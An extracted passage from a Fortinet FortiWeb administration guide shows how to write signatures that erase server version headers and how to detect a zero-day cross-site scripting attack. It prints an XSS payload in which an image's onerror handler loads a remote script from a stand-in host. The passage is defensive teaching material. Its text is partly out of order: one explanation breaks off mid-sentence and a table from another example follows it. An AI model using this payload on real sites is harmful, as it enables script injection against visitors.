Fortinet 407 FortiWeb 5.0 Patch 6 Administration Guide
The result is that the client receives HTTP responses with headers such as:
Server: XXXXXXXX
X-Powered-By: XXXXXXXX
X-AspNet-Version: XXXXXXXX
See also
Defining custom data leak & attack signatures
Example: Zero-day XSS
Example.com is a cloud hosting provider. Large and with a huge surface area for attacks, it
makes a tempting target and continuously sees attackers trying new forms of exploits.
Today, its incident response team discovered a previously unknown XSS attack. The attacker
had breached the web applications’ own input sanitization defenses and succeeded in
embedding 3 new methods of browser attacks in many forum web pages. Example.com wants
to write a signature that matches the new browser attacks, regardless of what method is used
to inject them.
The first new XSS attack found was:
<img
src=/images/nonexistant-file‘
onerror= document.write(
<scr I pt src= www.example.co/xss.js>);
/>
The above attack works by leveraging a client web browser’s error handling against itself.
Without actually naming JavaScript, the attack uses the JavaScript error handling event
onError() to execute arbitrary code with the HTML <img> tag. The <img> tag’s source is a
non-existent image. This triggers the web browser to load an arbitrary script from the attacker’s
Setting name Value
Direction Signature creation
Expression \bX-Powered-By:(.*)\b
Action Alert & Erase
Severity Low
Trigger Action notification-servers1
To improve performance, Example.com could use the attack logs generated by these signature
matches to notify system administrators to disable version headers on their web servers. As
each customer’s web server is reconfigured properly, this would reduce memory and processor
power required to rewrite its headers.
All of the example text colored magenta contributes to the success of the attacks, and should
be matched when creating a signature.